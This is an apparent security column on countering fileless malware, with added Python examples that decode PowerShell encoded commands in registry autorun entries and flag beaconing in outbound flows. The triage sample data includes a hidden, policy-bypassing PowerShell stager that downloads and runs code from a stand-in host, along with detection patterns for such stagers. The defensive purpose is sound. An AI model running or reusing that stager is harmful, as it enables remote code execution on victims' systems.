Security Think Tank: Patch, scan and lock down to counter fileless malware

What should organisations do at the very least to ensure business computers are protected from fileless malware?

We are nearly at the end of Q1 and wondering when those “upstairs” will suddenly come to life and worry about the GDPR deadline on 25 May. In the meantime, we have other fish to fry, such as the growth of fileless malware attacks and how best to detect and defend against them.

Fileless malware, also known as non-malware, runs in memory and, unlike earlier malware, leaves no file footprint on the hard drive. Its scripts and payloads are tucked away where their presence is hard to spot, such as the Windows registry, and are loaded from there straight into memory.

Execution is usually carried out by abusing legitimate system tools that are already present, PowerShell in particular, which makes detection harder still because nothing new is written to disk. However, an attack still needs to get a bootstrapping stage onto the computer (typically a malicious email attachment or web link whose script installs the rest) before the “fileless malware” is in place, and the malware itself will then need to communicate back to its command and control point. Those two moments, entry and call-back, are where the defences below bite.
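As an added example, not code from the original article, here is a small Python triage script of the sort a responder might run over the autorun entries a host inventory has dumped, since the registry is the hiding place the article names. It decodes PowerShell's -EncodedCommand switch (Base64 of UTF-16LE text, which is how powershell.exe itself reads it) and scores each launch string on the switches and payload patterns typical of fileless stagers. The registry value names, the command lines and the staging host 203.0.113.5 are all constructed for illustration.

```python
"""Triage PowerShell launch strings found in autorun locations (added example).

The registry Run values below are constructed for illustration; they are not
taken from a real incident. The -EncodedCommand decoding follows how
powershell.exe interprets that switch: Base64 of UTF-16LE text.
"""
import base64
import re
from typing import Dict, List, Optional


def encode_command(script: str) -> str:
    """Encode a script the way powershell.exe expects for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample of HKCU\Software\Microsoft\Windows\CurrentVersion\Run values,
# as an inventory script might dump them. The staging host is a documentation address.
SAMPLE_RUN_VALUES: Dict[str, str] = {
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "Backup": r"powershell.exe -File C:\Scripts\nightly-backup.ps1",
    "WindowsUpdate": (
        "powershell.exe -NoP -W Hidden -Exec Bypass -EncodedCommand "
        + encode_command("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/stage2')")
    ),
}

# Launch switches that legitimate scheduled scripts rarely need all at once
# (matched against the lower-cased command line).
SUSPICIOUS_SWITCHES = {
    r"-(?:nop|noprofile)\b": "profile suppressed",
    r"-(?:w|win|windowstyle)\s+hidden": "hidden window",
    r"-(?:ep|exec|executionpolicy)\s+bypass": "execution policy bypass",
    r"-(?:e|ec|enc|encodedcommand)\s+[a-z0-9+/=]{20,}": "encoded command",
}

# Patterns in the (decoded) payload that point at a download-and-execute stager.
SUSPICIOUS_PAYLOAD = {
    r"\biex\b|invoke-expression": "Invoke-Expression",
    r"downloadstring|downloadfile|invoke-webrequest|net\.webclient": "remote download",
    r"frombase64string": "nested Base64 decode",
}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_autorun(name: str, value: str) -> dict:
    """Score one autorun value; an entry that does not launch PowerShell scores zero."""
    lowered = value.lower()
    findings: List[str] = []
    decoded: Optional[str] = None
    if "powershell" in lowered or "pwsh" in lowered:
        findings += [label for pat, label in SUSPICIOUS_SWITCHES.items() if re.search(pat, lowered)]
        decoded = decode_encoded_command(value)
        # Look at the decoded script when there is one, otherwise at the raw command line.
        payload = (decoded or value).lower()
        findings += [label for pat, label in SUSPICIOUS_PAYLOAD.items() if re.search(pat, payload)]
    return {"name": name, "score": len(findings), "findings": findings, "decoded": decoded}


def triage_all(values: Dict[str, str]) -> List[dict]:
    """Triage every entry, most suspicious first."""
    return sorted((triage_autorun(n, v) for n, v in values.items()), key=lambda r: -r["score"])


if __name__ == "__main__":
    for r in triage_all(SAMPLE_RUN_VALUES):
        print(f"{r['score']:>2}  {r['name']:<14} {', '.join(r['findings']) or '-'}")
        if r["decoded"]:
            print(f"    decoded: {r['decoded']}")
```

The point of decoding rather than just matching on “powershell” is that the give-away strings (IEX, DownloadString) are invisible in the raw registry value; the same decoder applies to command lines captured by process-creation or PowerShell script block logging. Scores are only a ranking aid: a single hidden-window switch is common in benign scheduled jobs, whereas the full combination above almost never is.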

Protecting against a fileless malware attack

The first step is to ensure that computer operating systems, including any third-party drivers and all the applications installed on a computer, are fully patched and up to date.

Any libraries should be kept up to date as well, and this applies to all operating systems and applications, not just Microsoft's. The advice holds for every type of organisation and should be treated as one of the basic tasks.

As a second step, emails should be scanned for malicious content, attachments and web links. Typically, this can be taken as a service either from your internet service provider (ISP) or a specialist third party. 

Third, user accounts should be set up on the basis of least privilege: a normal user should only have “standard” privileges, not administrator privileges. Administrators themselves should have two accounts, a “standard” one for day-to-day tasks and a separate one used only for administering systems and the network.

Roles should also be established to limit what users can access (e.g. a person in sales cannot access HR records), and file permissions set accordingly (e.g. the staff handbook, which is likely a subset of the HR files, is made read-only to all staff). These basic steps will go a long way towards mitigating the ingress of malware, fileless or not, and help control any damage should malware get in.

What else can be done? Certainly run an antivirus product on all computers, and install a version that does behavioural monitoring of the system, not just signature matching: with nothing written to disk there is no file for a signature to match, so behaviour is what gives fileless malware away.

For organisations both small and large, ensure the internet connection passes through a good industry-branded firewall, not just the router's built-in one. Ideally, outgoing traffic should only originate from systems in a demilitarised zone (DMZ); as a minimum, make sure the firewall rules limit outgoing connections to specific IP addresses or address ranges and specific port ranges, so that a call-back to an unknown command and control host is blocked or at least logged.

For the larger organisations with deeper pockets, there are tools available that can monitor network behaviour and their use is recommended.
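As an added example, not from the article, the following Python puts the two network measures together: an egress allow-list of the “specific IP ranges and ports” kind applied to outbound flow records, plus the simplest behavioural check a monitoring tool performs, looking for the regularly timed call-backs an implant makes to its command and control point. The policy, the flow log and every address in it (documentation ranges) are constructed for illustration; a real deployment would feed it firewall or NetFlow exports.

```python
"""Egress allow-list check and simple beacon detection over outbound flows (added example).

The policy and the flow records are constructed for illustration and use
documentation address ranges; nothing here comes from a real network.
"""
import ipaddress
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev
from typing import Dict, List, Tuple

Flow = Tuple[datetime, str, ipaddress.IPv4Address, int]

# Constructed egress policy: (destination network, allowed destination ports).
EGRESS_ALLOW = [
    (ipaddress.ip_network("198.51.100.0/24"), {443}),  # assumed SaaS / update CDN
    (ipaddress.ip_network("192.0.2.53/32"), {53}),     # assumed upstream resolver
]

# Constructed outbound flow records: "timestamp source destination dport".
FLOW_LOG = """\
2018-03-20T09:00:00 10.0.0.12 198.51.100.20 443
2018-03-20T09:00:01 10.0.0.12 192.0.2.53 53
2018-03-20T09:00:05 10.0.0.31 203.0.113.5 8080
2018-03-20T09:00:30 10.0.0.12 198.51.100.20 80
2018-03-20T09:03:17 10.0.0.12 198.51.100.21 443
2018-03-20T09:05:05 10.0.0.31 203.0.113.5 8080
2018-03-20T09:10:04 10.0.0.31 203.0.113.5 8080
2018-03-20T09:15:06 10.0.0.31 203.0.113.5 8080
2018-03-20T09:20:41 10.0.0.12 198.51.100.20 443
"""


def parse_flows(text: str) -> List[Flow]:
    """Parse the whitespace-separated flow records, skipping blank lines."""
    flows: List[Flow] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport = line.split()
        flows.append((datetime.fromisoformat(ts), src, ipaddress.ip_address(dst), int(dport)))
    return flows


def is_allowed(dst, dport: int) -> bool:
    """True if the destination/port pair matches an allow-list entry."""
    return any(dst in net and dport in ports for net, ports in EGRESS_ALLOW)


def egress_violations(flows: List[Flow]) -> List[Flow]:
    """Flows a default-deny egress rule set would have blocked (or should alert on)."""
    return [f for f in flows if not is_allowed(f[2], f[3])]


def beacon_candidates(flows: List[Flow], min_hits: int = 4, max_jitter: float = 0.1):
    """Flag (src, dst, port) series whose inter-arrival times are almost constant.

    A coefficient of variation (stdev / mean) at or below max_jitter across at
    least min_hits connections is the classic shape of a timed call-back.
    """
    series: Dict[Tuple[str, str, int], List[datetime]] = defaultdict(list)
    for ts, src, dst, dport in flows:
        series[(src, str(dst), dport)].append(ts)
    hits = []
    for key, stamps in series.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            hits.append((key, round(avg)))
    return hits


if __name__ == "__main__":
    flows = parse_flows(FLOW_LOG)
    for ts, src, dst, dport in egress_violations(flows):
        print(f"DENY   {ts.isoformat()} {src} -> {dst}:{dport}")
    for (src, dst, dport), period in beacon_candidates(flows):
        print(f"BEACON {src} -> {dst}:{dport} every ~{period}s")
```

The two checks cover different failure modes. The allow-list catches the unknown destination outright, which is all a basic firewall rule set can do; the beacon check is what the behaviour-monitoring tools add, because a command and control server sitting behind an allowed port (443 on a reputable CDN range, say) passes the rule set and only stands out by the clockwork regularity of its traffic. Real implants add jitter to their sleep interval precisely to defeat this, so production tooling uses a wider tolerance and longer observation windows than the 10 per cent shown here.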

If you run a Microsoft network, also consider installing the Enhanced Mitigation Experience Toolkit (EMET), which applies exploit mitigations such as DEP and ASLR to applications that do not opt in to them themselves. Note that Microsoft has announced EMET's end of life for July 2018; on Windows 10 its features live on as Exploit Protection in Windows Defender Exploit Guard, so plan to move to that. Setting user roles, privileges and file permissions are all standard features of a Microsoft network: use them.
